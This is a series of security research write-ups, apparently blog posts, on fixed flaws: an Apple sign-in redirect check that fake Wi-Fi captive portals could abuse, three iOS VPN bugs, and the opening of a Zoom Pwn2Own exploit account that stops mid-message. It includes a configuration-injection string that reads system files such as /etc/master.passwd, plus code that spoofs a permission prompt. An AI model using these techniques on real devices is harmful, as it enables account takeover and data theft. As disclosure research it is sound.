We expect that the primary use-case of this feature is not for signing in on iCloud (as it is pretty rare to use icloud.com in Safari on a phone), but we expect that the main motivator was for “Sign in with Apple” on the web, for which this feature works as well. For those sites additional options are shown when creating a new account, for example whether to hide your email address.

Although all of this works in both macOS and iOS, with TouchID and FaceID and for all sites using AppleID logins, we’ll use iOS, TouchID and https://icloud.com to explain the vulnerability, but keep in mind that the impact is more broad.

Logging in on Apple domains happens using OAuth2. On https://icloud.com, this uses the web_message mode. This works as follows when doing a normal login:

  1. https://icloud.com embeds an iframe pointing to https://idmsa.apple.com/appleauth/auth/authorize/signin?client_id=d39ba9916b7251055b22c7f910e2ea796ee65e98b2ddecea8f5dde8d9d1a815d &redirect_uri=https%3A%2F%2Fwww.icloud.com&response_mode=web_message &response_type=code.
  2. The user logs in (including steps such as entering a 2FA-token) inside the iframe.
  3. If the authentication succeeds, the iframe posts a message back to the parent window with a grant_code for the user using window.parent.postMessage(<token>, "https://icloud.com") in JavaScript.
  4. The grant_code is used by the icloud.com page to continue the login process.

Two of the parameters are very important in the iframe URL: the client_id and redirect_uri. The idmsa.apple.com server keeps track of a list of registered clients and the redirect URIs that are allowed for each client. In the case of the web_message flow, the redirect URI is not used as a real redirect, but instead it is used as the required page origin of the posted message with the grant code (the second argument for postMessage).

For all OAuth2 modes, it is very important that the authentication server validates the redirect URI correctly. If it does not do that, then the user’s grant_code could be sent to a malicious webpage instead. When logging in on the website, idmsa.apple.com performs that check correctly: changing the redirect_uri to anything else results in an error page.

When the user authenticates using TouchID, the iframe is handled differently, but the outer page remains the same. When Safari detects a new page with a URL matching the example URL above, it does not download the page, but it invokes the process AKAppSSOExtension instead. This process communicates with the AuthKit daemon (akd) to handle the biometric authentication and to retrieve a grant_code. If the user successfully authenticates then Safari injects a fake response to the pending iframe request which posts the message back, in the same way that the normal page would do if the authentication had succeeded. akd communicates with an API on gsa.apple.com, to which it sends the details of the request and from which it receives a grant_code.

What we found was that the gsa.apple.com API had a bug: even though the client_id and redirect_uri were included in the data submitted to it by akd, it did not check that the redirect URI matches the client ID. Instead, there was only a whitelist applied by AKAppSSOExtension on the domains. All domains ending with apple.com, icloud.com and icloud.com.cn were allowed. That may sound secure enough, but keep in mind that apple.com has hundreds (if not thousands) of subdomains. If any of these subdomains can somehow be tricked into running malicious JavaScript then they could be used to trigger the prompt for a login with the iCloud client_id, allowing that script to retrieve the user’s grant code if they authenticate. Then the page can send it back to an attacker which can use it to obtain a session on icloud.com.

Some examples of how that could happen:

  • A cross-site scripting vulnerability on any subdomain. These are found quite regularly, https://support.apple.com/en-us/HT201536 lists at least 30 candidates from 2019, and that just covers the domains that are important enough to investigate.
  • A dangling subdomain that can be taken over by an attacker. While we are not aware of any instances of this happening to Apple, recently someone found 670 subdomains of microsoft.com available for takeover: https://nakedsecurity.sophos.com/2020/03/06/researcher-finds-670-microsoft-subdomains-vulnerable-to-takeover/
  • A user visiting a page on any subdomain over HTTP. The important subdomains will have a HSTS header, but many will not. The domain apple.com is not HSTS preloaded with includeSubdomains.

The first two require the attacker to trick users into visiting the malicious page. The third requires that the attacker has access to the user’s local network. While such an attack is in general harder, it does allow a very interesting example: captive.apple.com. When an Apple device connects to a wifi-network, it will try to access http://captive.apple.com/hotspot-detect.html. If the response does not match the usual response, then the system assumes there is a captive portal where the user will need to do something first. To allow the user to do that, the response page is opened and shown. Usually, this redirects the user to another page where they need to login, accept terms and conditions, pay, etc. However, it does not need to do that. Instead, the page could embed JavaScript which triggers the TouchID login, which will be allowed as it is on an apple.com subdomain. If the user authenticates, then the malicious JavaScript receives the user’s grant_code.

The page could include all sorts of content to make the user more likely to authenticate, for example by making the page look like it is part of iOS itself or a “Sign in with Apple” button. “Sign in with Apple” is still pretty new, so user’s might not notice that the prompt is slightly different than usual. Besides, many users will probably automatically authenticate when they see a TouchID prompt as those are almost always about them authenticating to the phone, the fact that users should also determine if they want to authenticate to the page which opened the prompt is not made obvious.

By setting up a fake hotspot in a location where users expect to receive a captive portal (for example at an airport, hotel or train station), it would have been possible to gain access to a significant number of iCloud accounts, which would have allowed access to backups of pictures, location of the phone, files and much more. As I mentioned, this also bypasses the normal 2FA approve + 6-digit code step.

We reported this vulnerability to Apple, and they fixed it the same day they triaged it. The gsa.apple.com API now correctly checks that the redirect_uri matches the client_id. Therefore, this could be fixed entirely server-side.

It makes a lot of sense to us how this vulnerability could have been missed: people testing this will probably have focused on using untrusted domains for the redirect_uri. For example, sometimes it works to use https://www.icloud.com.attacker.com or https://attacker.com/https://www.icloud.com. In this case those both fail, however, by trying just those you would miss the ability to use a malicious subdomain.

The video below illustrates the vulnerability.

iOS VPN support: 3 different bugs

7 October 2020 at 00:00

Since iOS version 8, support has been present for third-party apps to implement Network Extensions. Network Extensions can be a variety of things that can all inspect or modify network traffic in some way, like ad-blockers and VPNs.

For VPNs there are actually three variants that a Network Extension can implement: a “Personal VPN”, where the app supplies only a configuration for a built-in VPN type (IPsec), or the app can implement the code for the VPN itself, either as “Packet Tunnel Provider” or “App Proxy Provider”. we did not spend any time on the latter two, but only investigated Personal VPNs.

To install a VPN Network Extension, the user needs to approve it. This is a little different from other permission prompts in iOS: the user needs to approve it and then also enter their passcode. This makes sense because a VPN can be very invasive, so users must be aware of the installation. If the user uninstalls the app, then any Personal VPN configurations it added are also automatically removed.

Bug 1: App spoofing

To request the addition of a new VPN configuration, the app sends a request to the nehelper daemon using an NSXPCConnection. NSXPCConnection is a high-level API built on XPC that can be used to call specific Objective-C methods between processes. Arguments that are passed to the method are serialized using NSSecureCoding. The object representing the configuration of a Network Extension is an object of the class NEConfiguration. As can be seen from the following class dump of NEConfiguration, the name (_applicationName) and app bundle identifier (_application) of the app which created the request are included in this object:

@interface NEConfiguration : NSObject <NEConfigurationValidating,
			NEProfilePayloadHandlerDelegate, NSCopying, NSSecureCoding> {
    NEVPN * _VPN;
    NEAOVPN * _alwaysOnVPN;
    NEVPNApp * _appVPN;
    NSString * _application;
    NSString * _applicationIdentifier;
    NSString * _applicationName;
    NEContentFilter * _contentFilter;
    NSString * _externalIdentifier;
    long long  _grade;
    NSUUID * _identifier;
    NSString * _name;
    NEPathController * _pathController;
    NEProfileIngestionPayloadInfo * _payloadInfo;
}

It turns out that the permission prompt used that name, instead of the actual name of the app that the user would be familiar with. Because that is part of an object received from the app, this means that it could present the name of an entirely different app, for example one the user might be more inclined to trust as a VPN provider. Because it is even possible to add newlines in this value, a malicious app could even attempt to obfuscate what the prompt is actually asking. For example, making it seem like a prompt about installing a software update (where users would expect to enter their passcode).

It is also possible to change the app bundle identifier to something else. By doing this, the VPN configuration is no longer automatically removed when the user uninstalls the app. Therefore, the configuration persists even when the user thinks they removed it by removing the app.

So, by calling these private methods:

NEVPNManager *manager = [NEVPNManager sharedManager];
...
NEConfiguration *configuration = [manager configuration];

[configuration setApplication:nil];
[configuration setApplicationName:@"New Network Settings for 4G"];

[manager saveToPreferencesWithCompletionHandler:^(NSError *error) {
    ...
}];

This results in the following permission prompt:

And this configuration is not automatically removed when uninstalling the app.

Apple fixed this issue in the iOS 14 update.

Bug 2: Configuration file injection (CVE-2020-9836)

IPsec VPNs are handled on iOS by racoon, an IPsec implementation that is part of the open source project ipsec-tools. Note that the upstream project for this was abandoned in 2014:

Important Note

The development of ipsec-tools has been ABANDONED.

ipsec-tools has security issues, and you should not use it. Please switch to a secure alternative!

Whenever an IPsec VPN is asked to connect, the system generates a new racoon configuration file, places it in /var/run/racoon/ and tells racoon to reload its configuration. This happens no matter where the VPN configuration came from: a manually added VPN, Personal VPN Network Extension app or a VPN configuration from a .mobileconfig profile.

While playing around with the configuration options, we noticed a strange error whenever we included a " character in the “Group name” or “Account Name” values. As it turns out, these values are copied literally to the configuration file without any escaping. Because the string itself was enclosed in quotes, this resulted in a syntax error. By using ";, it was possible to add new racoon configuration options.

Racoon supports many more configuration options than what is available via the UI, a Personal VPN API or a .mobileconfig file. Some of those could have an effect that should not be allowed for an app, even though it may be approved as a Network Extension. If you check the man page, you might notice script as an interesting option. Sadly, this is not included in the build on iOS.

One interesting option that did work was the following:

A"; my_identifier keyid file "/etc/master.passwd

This results in the following line in the configuration file:

	my_identifier keyid_use "A"; my_identifier keyid file "/etc/master.passwd";

This second option tells racoon to read its group name from the file /etc/master.passwd, which overrides the previous option. Using this as a group name would cause the contents of /etc/master.passwd to be included in the initial IPsec packet:

Of course, on iOS the /etc/master.passwd file is not sensitive as it is always the same, but there are various system locations that racoon is allowed to read from due to its sandbox configuration:

  • /var/root/Library/
  • /private/etc/
  • /Library/Preferences/

There is, however, an important limitation. The group name is added to the initial handshake message. This packet is sent over UDP, therefore, the entire packet can be at most 65,535 bytes. The group name value is not truncated, so any files larger than 65,535 bytes, subtracting the overhead for the rest of the packet, IP and UDP header, can not be read.

For example, following files were found to often be below the limit and may sensitive information that would normally not be available to an app:

  • /Library/Preferences/SystemConfiguration/com.apple.wifi.plist
  • /private/var/root/Library/Lockdown/data_ark.plist

By exploiting this issue, a Network Extension app could read from files that would normally not be allowed due to the app sandbox. Other potential impact could be accessing Keychain items or deleting files on those directories by changing the pid file location.

Apple initially indicated that they planned to release a fix in iOS 13.5, but we found no changes in that version. Then, they applied a fix in iOS 13.6 beta 2 that attempted to filter out racoon options from these fields, which was easily bypassed by replacing the spaces in the example with tabs. Finally, in the release of iOS 13.6 this was actually fixed. Sadly, due to this back and forth, Apple seems to have forgotten to include it in their changelog, even after multiple reminders.

Bug 3: OOB reads (CVE-2020-9837)

As mentioned, the upstream project for racoon is abandoned and it indicates that it contains known security issues. Apple has patched quite a few vulnerabilities in racoon over the years (in the iOS 5 era even being used for a jailbreak), but likely because there is no upstream project, these fixes were often not correct or incomplete. In particular, we noticed that some bounds checks Apple added were off by a small amount.

A common pattern in racoon for parsing packets containing a list of elements is to do the following. The start of the list is cast to a struct with the same representation as the element header (d). A variable keeps track of the remaining length of the buffer (tlen). Then, a loop is started. In each iteration, it handles the current element. Then it advances the struct to the next value and it decreases the number of remaining bytes with the size of the current element. If that number becomes negative or zero, the loop ends.

For example, ipsec_doi.c:534-772:

534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
/*
 * get ISAKMP data attributes
 */
static int
t2isakmpsa(trns, sa)
	struct isakmp_pl_t *trns;
	struct isakmpsa *sa;
{
	struct isakmp_data *d, *prev;
	int flag, type;
	int error = -1;
	int life_t;
	int keylen = 0;
	vchar_t *val = NULL;
	int len, tlen;
	u_char *p;

	tlen = ntohs(trns->h.len) - sizeof(*trns);
	prev = (struct isakmp_data *)NULL;
	d = (struct isakmp_data *)(trns + 1);

	/* default */
	life_t = OAKLEY_ATTR_SA_LD_TYPE_DEFAULT;
	sa->lifetime = OAKLEY_ATTR_SA_LD_SEC_DEFAULT;
	sa->lifebyte = 0;
	sa->dhgrp = racoon_calloc(1, sizeof(struct dhgroup));
	if (!sa->dhgrp)
		goto err;

	while (tlen > 0) {

		type = ntohs(d->type) & ~ISAKMP_GEN_MASK;
		flag = ntohs(d->type) & ISAKMP_GEN_MASK;

		plog(ASL_LEVEL_DEBUG, 
			"type=%s, flag=0x%04x, lorv=%s\n",
			s_oakley_attr(type), flag,
			s_oakley_attr_v(type, ntohs(d->lorv)));

		/* get variable-sized item */
		switch (type) {
		case OAKLEY_ATTR_GRP_PI:
		case OAKLEY_ATTR_GRP_GEN_ONE:
		case OAKLEY_ATTR_GRP_GEN_TWO:
		case OAKLEY_ATTR_GRP_CURVE_A:
		case OAKLEY_ATTR_GRP_CURVE_B:
		case OAKLEY_ATTR_SA_LD:
		case OAKLEY_ATTR_GRP_ORDER:
			if (flag) {	/*TV*/
				len = 2;
				p = (u_char *)&d->lorv;
			} else {	/*TLV*/
				len = ntohs(d->lorv);
				if (len > tlen) {
					plog(ASL_LEVEL_ERR, 
						 "invalid ISAKMP-SA attr, attr-len %d, overall-len %d\n",
						 len, tlen);
					return -1;
				}
				p = (u_char *)(d + 1);
			}
			val = vmalloc(len);
			if (!val)
				return -1;
			memcpy(val->v, p, len);
			break;

		default:
			break;
		}

		switch (type) {
		case OAKLEY_ATTR_ENC_ALG:
			sa->enctype = (u_int16_t)ntohs(d->lorv);
			break;

		case OAKLEY_ATTR_HASH_ALG:
			sa->hashtype = (u_int16_t)ntohs(d->lorv);
			break;

		case OAKLEY_ATTR_AUTH_METHOD:
			sa->authmethod = ntohs(d->lorv);
			break;

		case OAKLEY_ATTR_GRP_DESC:
			sa->dh_group = (u_int16_t)ntohs(d->lorv);
			break;

		case OAKLEY_ATTR_GRP_TYPE:
		{
			int type = (int)ntohs(d->lorv);
			if (type == OAKLEY_ATTR_GRP_TYPE_MODP)
				sa->dhgrp->type = type;
			else
				return -1;
			break;
		}
		case OAKLEY_ATTR_GRP_PI:
			sa->dhgrp->prime = val;
			break;

		case OAKLEY_ATTR_GRP_GEN_ONE:
			vfree(val);
			if (!flag)
				sa->dhgrp->gen1 = ntohs(d->lorv);
			else {
				int len = ntohs(d->lorv);
				sa->dhgrp->gen1 = 0;
				if (len > 4)
					return -1;
				memcpy(&sa->dhgrp->gen1, d + 1, len);
				sa->dhgrp->gen1 = ntohl(sa->dhgrp->gen1);
			}
			break;

		case OAKLEY_ATTR_GRP_GEN_TWO:
			vfree(val);
			if (!flag)
				sa->dhgrp->gen2 = ntohs(d->lorv);
			else {
				int len = ntohs(d->lorv);
				sa->dhgrp->gen2 = 0;
				if (len > 4)
					return -1;
				memcpy(&sa->dhgrp->gen2, d + 1, len);
				sa->dhgrp->gen2 = ntohl(sa->dhgrp->gen2);
			}
			break;

		case OAKLEY_ATTR_GRP_CURVE_A:
			sa->dhgrp->curve_a = val;
			break;

		case OAKLEY_ATTR_GRP_CURVE_B:
			sa->dhgrp->curve_b = val;
			break;

		case OAKLEY_ATTR_SA_LD_TYPE:
		{
			int type = (int)ntohs(d->lorv);
			switch (type) {
			case OAKLEY_ATTR_SA_LD_TYPE_SEC:
			case OAKLEY_ATTR_SA_LD_TYPE_KB:
				life_t = type;
				break;
			default:
				life_t = OAKLEY_ATTR_SA_LD_TYPE_DEFAULT;
				break;
			}
			break;
		}
		case OAKLEY_ATTR_SA_LD:
			if (!prev
			 || (ntohs(prev->type) & ~ISAKMP_GEN_MASK) !=
					OAKLEY_ATTR_SA_LD_TYPE) {
				plog(ASL_LEVEL_ERR, 
				    "life duration must follow ltype\n");
				break;
			}

			switch (life_t) {
			case IPSECDOI_ATTR_SA_LD_TYPE_SEC:
				sa->lifetime = ipsecdoi_set_ld(val);
				vfree(val);
				if (sa->lifetime == 0) {
					plog(ASL_LEVEL_ERR, 
						"invalid life duration.\n");
					goto err;
				}
				break;
			case IPSECDOI_ATTR_SA_LD_TYPE_KB:
				sa->lifebyte = ipsecdoi_set_ld(val);
				vfree(val);
				if (sa->lifebyte == 0) {
					plog(ASL_LEVEL_ERR, 
						"invalid life duration.\n");
					goto err;
				}
				break;
			default:
				vfree(val);
				plog(ASL_LEVEL_ERR, 
					"invalid life type: %d\n", life_t);
				goto err;
			}
			break;

		case OAKLEY_ATTR_KEY_LEN:
		{
			int len = ntohs(d->lorv);
			if (len % 8 != 0) {
				plog(ASL_LEVEL_ERR, 
					"keylen %d: not multiple of 8\n",
					len);
				goto err;
			}
			sa->encklen = (u_int16_t)len;
			keylen++;
			break;
		}
		case OAKLEY_ATTR_PRF:
		case OAKLEY_ATTR_FIELD_SIZE:
			/* unsupported */
			break;

		case OAKLEY_ATTR_GRP_ORDER:
			sa->dhgrp->order = val;
			break;

		default:
			break;
		}

		prev = d;
		if (flag) {
			tlen -= sizeof(*d);
			d = (struct isakmp_data *)((char *)d + sizeof(*d));
		} else {
			tlen -= (sizeof(*d) + ntohs(d->lorv));
			d = (struct isakmp_data *)((char *)d + sizeof(*d) + ntohs(d->lorv));
		}
	}

	/* key length must not be specified on some algorithms */
	if (keylen) {
		if (sa->enctype == OAKLEY_ATTR_ENC_ALG_DES
		 || sa->enctype == OAKLEY_ATTR_ENC_ALG_3DES) {
			plog(ASL_LEVEL_ERR, 
				"keylen must not be specified "
				"for encryption algorithm %d\n",
				sa->enctype);
			return -1;
		}
	}

	return 0;
err:
	return error;
}

In 9 places in the code this pattern was used without a check at the start of the loop body that the remainder of the list contained at least the number of bytes that the header is long, nor was there a check that after the parsing the number of remaining bytes was exactly 0. This means that for the last iteration of the loop, the struct may contain fields that are filled with data past the end of the buffer.

In some cases where variable length elements are used, the check if the buffer had enough data for the variable length part was also slightly off, also due to failing to take into account the length of the header of the current packet. In the example above, on line 587 the code checks that len > tlen, but this fails to take into account the fact that the size of the header the element has not yet been subtracted from tlen (as can be seen at line 753).

The end result was that in many places where packets are being parsed it was possible to read a couple of additional bytes from the buffer as if they are part of the packet. In many cases, it was possible to observe information about those bytes externally. For example, depending on the element type, the connection might be aborted if an OOB byte was 0x00.

These were fixed by Apple in iOS 13.5 (CVE-2020-9837).

Conclusion

VPNs are intended to offer security for users on an untrusted network. However, with the introduction of Network Extensions, the OS now also needs to protect itself against a potentially malicious VPN app. Properly securing an existing feature for such a new context is difficult. This is even more difficult due to the use of an existing, but abandoned, project. The way racoon is written, C code with complicated pointer arithmetic, makes spotting these bugs very difficult. It is very likely that more memory corruption bugs can be found in it.

Zoom RCE from Pwn2Own 2021

23 August 2021 at 00:00

On April 7 2021, Thijs Alkemade and Daan Keuper demonstrated a zero-click remote code execution exploit in the Zoom video client during Pwn2Own 2021. Now that related bugs have been fixed for all users (see ZDI-21-971 and ZSB-22003) we can safely detail the bugs we exploited and how we found them. In this blog post, we wanted to not only explain the bugs and our exploit, but provide a log of our entire process. We hope that detailing our process helps others with similar research in the future. While we had profound experience with exploiting memory corruption vulnerabilities on many platforms, both of us had zero experience with this on Windows. So during this project we had a lot to learn about the Windows internals.

Wow - with just 10 seconds left of their 2nd attempt, Daan Keuper and Thijs Alkemade were able to demonstrate their code execution via Zoom messenger. 0 clicks were used in the demo. They're off to the disclosure room for details. #Pwn2Own pic.twitter.com/qpw7yIEQLS

— Zero Day Initiative (@thezdi) April 7, 2021

This is going to be quite a long post. So before we dive into the details, now that the vulnerabilities have been fixed, below you can see a full run of the exploit (now fixed) in action. The post hereafter will explain in detail every step that took place during the exploitation phase and how we came to this solution.

Announcement

Participating in Pwn2Own was one of the initial goals we had for our new research department, Sector 7. When we made our plans last year, we didn’t expect that it would be as soon as April 2021. In recent years the Vancouver edition in spring has focused on browsers, local privilege escalation and virtual machines. The software in these categories has received a lot of attention to security, including many specific defensive layers. We’d also be competing with many others who may have had a full year to prepare their exploits.

To our surprise, on January 27th Pwn2Own was officially announced with a new category: “Enterprise Communications”, featuring Microsoft Teams and the Zoom Meetings client. These tools have become incredibly important due to the pandemic, so it makes sense for those to be added to Pwn2Own. We realized that either of these would be a much better target for us, because most researchers would have to start from scratch.

Announcing #Pwn2Own Vancouver 2021! Over $1.5 million available across 7 categories. #Tesla returns as a partner, and we team up with #Zoom for the new Enterprise Communications category. Read all the details at https://t.co/suCceKxI0T #P2O

— Zero Day Initiative (@thezdi) January 26, 2021

We had not yet decided between Zoom and Microsoft Teams. We made a guess for what type of vulnerability we would expect could lead to RCE in those applications: Microsoft Teams is developed using Electron with a few native libraries in C++ (mainly for platform integration). Electron apps are built using HTML+JavaScript with a Chromium runtime included. The most likely path for exploitation would therefore be a cross-site scripting issue, possibly in combination with a sandbox escape. Memory corruption could be possible, but the number of native libraries is small. Zoom is written in C++, meaning the most likely vulnerability class would be memory corruption. Without any good data on which would be more likely, we decided on Zoom, simply because we like doing research on memory corruption more than XSS.

Step 1: What is this “Zoom”?

Both of us had not used Zoom much (if at all). So, our very first step was to go through the application thoroughly, focused on identifying all ways you can send something to another user, as that was the vector we wanted for the attack. That turned out to be quite a list. Most users will mainly know the video chat functionality, but there is also a quite full featured chat client included, with the ability to send images, create group chats, and many more. Within meetings, there’s of course audio and video, but also another way to chat, send files, share the screen, etc. We made a few premium accounts too, to make sure we saw as much as possible of the features.

Step 2: Network interception

The next step was to get visibility in the network communication of the client. We would need to see the contents of the communication in order to be able to send our own malicious traffic. Zoom uses a lot of HTTPS requests (often with JSON or protobufs), but the chat connection itself uses a XMPP connection. Meetings appear to have a number of different options depending on what the network allows, the main one a custom UDP based protocol. Using a combination of proxies, modified DNS records, sslsplit and a new CA certificate installed in Windows, we were able to inspect all traffic, including HTTP and XMPP, in our test environment. We initially focused on HTTP and XMPP, as the meeting protocol seemed like a (custom) binary protocol.

Step 3: Disassembly

The following step was to load the relevant binaries in our favorite disassemblers. Because we knew we wanted a vulnerability exploitable from another user, we started with trying to match the handling of incoming XMPP stanzas (a stanza is an XMPP element you can send to another user) to the code. We found that the XMPP XML stream is initially parsed by XmppDll.dll. This DLL is based on the C++ XMPP library gloox. This meant that reverse-engineering this part was quite easy, even for the custom extensions Zoom added.

However, it became quite clear that we weren’t going to find any good vulnerabilities here. XmppDll.dll only parses incoming XMPP stanzas and copies the XML data to a new C++ object. No real business logic is implemented here, everything is passed to a callback in a different DLL.

In the next DLL’s we hit a bit of a wall. The disassembly of the other DLL’s was almost impossible to get through due to a large number of calls to vtables and other DLL’s. Almost nothing was available to give us some grip on the disassembled code. The main reason for that was that most DLL’s do no logging at all. Logs are of course useful for dynamic analysis, but also for static analysis they can be very useful, as they often reveal function and variable names and give information about what checks are performed. We found that Zoom had generated a log of the installation, but while running it nothing was logged at all.

After some searching, we found the support pages for how to generate a Troubleshooting log for Zoom:

After reporting a problem through the desktop client, the Support team may ask you to install a special troubleshooting package of Zoom to log more information about your issue and help Zoom engineers investigate the issue. After recreating the issue, these files need to be sent to your Zoom support agent via your existing ticket. The troubleshooting version does not allow Zoom support or engineering access to your computer, but rather just gathers more information about your specific issue.

This suggests that logging is compile-time disabled, but special builds with logging do exist. They are only given out by support to debug a specific issue. For bug bounties any form of social engineering is usually banned. While the Pwn2Own rules don’t mention it, we did not want to antagonize Zoom about this. Therefore, we decided to ask for this version. As Zoom was sponsoring Pwn2Own, we thought they might be willing to give us that client if we asked through ZDI, so we did just that. It is not uncommon for companies to offer specific tools for researchers to help in their research, such as test units Tesla can give to interested researchers.

Sadly, Zoom turned this request down - we don’t know why. But before we could fall back to any social engineering, we found something else that was almost as good. It turns out Zoom has a SDK that can be used to integrate the Zoom meeting functionality in other applications. This SDK consists of many of the same libraries as the client itself, but in this case these DLL files do have logging present. It doesn’t have all of them (some UI related DLL’s are missing), but it has enough to get a good overview of the functionality of the core message handling.

The logging also revealed file names and function names, as can be seen in this disassembled example:

iVar2 = logging::GetMinLogLevel();
if (iVar2 < 2) {
    logging::LogMessage::LogMessage
              (local_c8,
               "c:\\ZoomCode\\client_sdk_2019_kof\\client\\src\\framework\\common\\SaasBeeWebServiceModule\\ZoomNetworkMonitor.cpp"
               , 0x39, 1);
    uVar3 = log_message(iVar2 + 8, "[NetworkMonitor::~NetworkMonitor()]", " ", uVar1);
    log_message(uVar3);
    logging::LogMessage::~LogMessage(local_c8);
}

Step 4: Hunting for bugs

With this we could start looking for bugs in earnest. Specifically, we were looking for any kind of memory corruption vulnerability. These often occur during parsing of data, but in this case that was not a likely vector for the XMPP connection. A well known library is used for XMPP and we would also need to get our payload through the server, so any invalid XML would not get to the other client. Many operations using strings are using C++ std::string objects, which meant that buffer overflows due to mistakes in length calculations are also not very likely.

About 2 weeks after we started this research, we noticed an interesting thing about the base64 decoding that was happening in a couple of places:

len = Cmm::CStringT<char>::size(param_1);
result = malloc(len << 2);
len = Cmm::CStringT<char>::size(param_1);
buffer = Cmm::CStringT<char>::c_str(param_1);
status = EVP_DecodeBlock(result, buffer, len);

EVP_DecodeBlock is the OpenSSL function that handles base64-decoding. Base64 is an encoding that turns three bytes into four characters, so decoding results in something which is always 3/4 of the size of the input (ignoring any rounding). But instead of allocating something of that size, this code is allocating a buffer which is four times larger than the input buffer (shifting left twice is the same as multiplying by four). Allocating something too big is not an exploitable vulnerability (maybe if you trigger an integer overflow, but that’s not very practical), but what it did show was that when moving data from and to OpenSSL incorrect calculations of buffer sizes might be present. Here, std::string objects will need to be converted to C char* pointers and separate length variables. So we decided to focus on the calling of OpenSSL functions from Zoom’s own code for a while.

Step 5: The Bug

Zoom’s chat functionality supports a setting named “Advanced chat encryption” (only available for paying users). This functionality has been around for a while. By default version 2 is used, but if a contact sends a message using version 1 then it is still handled. This is what we were looking at, which involves a lot of OpenSSL functions.

Version 1 works more or less like this (as far as we could understand from the code):

  1. The sender sends a message encrypted using a symmetric key, with a key identifier indicating which message key was used.
<message from="[email protected]/ZoomChat_pc" to="[email protected]" id="85DC3552-56EE-4307-9F10-483A0CA1C611" type="chat">
  <body>[This is an encrypted message]</body>
  <thread>gloox{BFE86A52-2D91-4DA0-8A78-DC93D3129DA0}</thread>
  <active xmlns="http://jabber.org/protocol/chatstates"/>
  <ze2e>
    <tp>
      <send>[email protected]</send>
      <sres>ZoomChat_pc</sres>
      <scid>{01F97500-AC12-4F49-B3E3-628C25DC364E}</scid>
      <ssid>[email protected]</ssid>
      <cvid>zc_{10EE3E4A-47AF-45BD-BF67-436793905266}</cvid>
    </tp>
    <action type="SendMessage">
      <msg>
        <message>/fWuV6UYSwamNEc40VKAnA==</message>
        <iv>sriMTH04EXSPnphTKWuLuQ==</iv>
      </msg>
      <xkey>
        <owner>{01F97500-AC12-4F49-B3E3-628C25DC364E}</owner>
      </xkey>
    </action>
    <app v="0"/>
  </ze2e>
  <zmtask feature="35">
    <nos>You have received an encrypted message.</nos>
  </zmtask>
  <zmext expire_t="1680466611000" t="1617394611169">
    <from n="John Doe" e="[email protected]" res="ZoomChat_pc"/>
    <to/>
    <visible>true</visible>
  </zmext>
</message>
  1. The recipient checks to see if they have the symmetric key with that key identifier. If not, the recipient’s client automatically sends a RequestKey message to the other user, which includes the recipient’s X509 certificate in order to encrypt the message key (<pub_cert>).
<message xmlns="jabber:client" to="[email protected]" id="{684EF27D-65D3-4387-9473-E87279CCA8B1}" type="chat" from="[email protected]/ZoomChat_pc">
  <thread>gloox{25F7E533-7434-49E3-B3AC-2F702579C347}</thread>
  <active xmlns="http://jabber.org/protocol/chatstates"/>
  <zmext>
    <msg_type>207</msg_type>
    <from n="Jane Doe" res="ZoomChat_pc"/>
    <to/>
    <visible>false</visible>
  </zmext>
  <ze2e>
    <tp>
      <send>[email protected]</send>
      <sres>ZoomChat_pc</sres>
      <scid>tJKVTqrloavxzawxMZ9Kk0Dak3LaDPKKNb+vcAqMztQ=</scid>
      <recv>[email protected]</recv>
      <ssid>[email protected]</ssid>
      <cvid>zc_{10EE3E4A-47AF-45BD-BF67-436793905266}</cvid>
    </tp>
    <action type="RequestKey">
      <xkey>
        <pub_cert>MIICcjCCAVqgAwIBAgIBCjANBgkqhkiG9w0BAQsFADA3MSEwHwYDVQQLExhEb21haW4gQ29udHJvbCBWYWxpZGF0ZWQxEjAQBgNVBAMMCSouem9vbS51czAeFw0yMTA0MDIxMjAzNDVaFw0yMjA0MDIxMjMzNDVaMEoxLDAqBgNVBAMMI2VrM19mZHZ5dHFnbTB6emxtY25kZ2FAeG1wcC56b29tLnVzMQ0wCwYDVQQKEwRaT09NMQswCQYDVQQGEwJVUzCBmzAQBgcqhkjOPQIBBgUrgQQAIwOBhgAEAa5LZ0vdjfjTDbPnuK2Pj1WKRaBee0QoAUQ281Z+uG4Ui58+QBSfWVVWCrG/8R4KTPvhS7/utzNIe+5R8oE69EPFAFNBMe/nCugYfi/EzEtwzor/x1R6sE10rIBGwFwKNSnzxtwDbiFmjpWFFV7TAdT/wr/f1E1ZkVR4ooitgVwGfREVMA0GCSqGSIb3DQEBCwUAA4IBAQAbtx2A+A956elf/eGtF53iQv2PT9I/4SNMIcX5Oe/sJrH1czcTfpMIACpfbc9Iu6n/WNCJK/tmvOmdnFDk2ekDt9jeVmDhwJj2pG+cOdY/0A+5s2E5sFTlBjDmrTB85U4xw8ahiH9FQTvj0J4FJCAPsqn0v6D87auA8K6w13BisZfDH2pQfuviJSfJUOnIPAY5+/uulaUlee2HQ1CZAhFzbBjF9R2LY7oVmfLgn/qbxJ6eFAauhkjn1PMlXEuVHAap1YRD8Y/xZRkyDFGoc9qZQEVj6HygMRklY9xUnaYWgrb9ZlCUaRefLVT3/6J21g6G6eDRtWvE1nMfmyOvTtjC</pub_cert>
        <owner>{01F97500-AC12-4F49-B3E3-628C25DC364E}</owner>
      </xkey>
    </action>
    <v2data action="None"/>
    <app v="0"/>
  </ze2e>
  <zmtask feature="50"/>
</message>
  1. The sender responds to the RequestKey message with a ResponseKey message. This contains the sender’s X509 certificate in <pub_cert>, an <encoded> XML element, which contains the message key encrypted using both the sender’s private key and the recipient’s public key, and a signature in <signature>.
<message from="[email protected]/ZoomChat_pc" to="[email protected]" id="4D6D109E-2AF2-4444-A6FD-55E26F6AB3F0" type="chat">
  <thread>gloox{24A77779-3F77-414B-8BC7-E162C1F3BDDF}</thread>
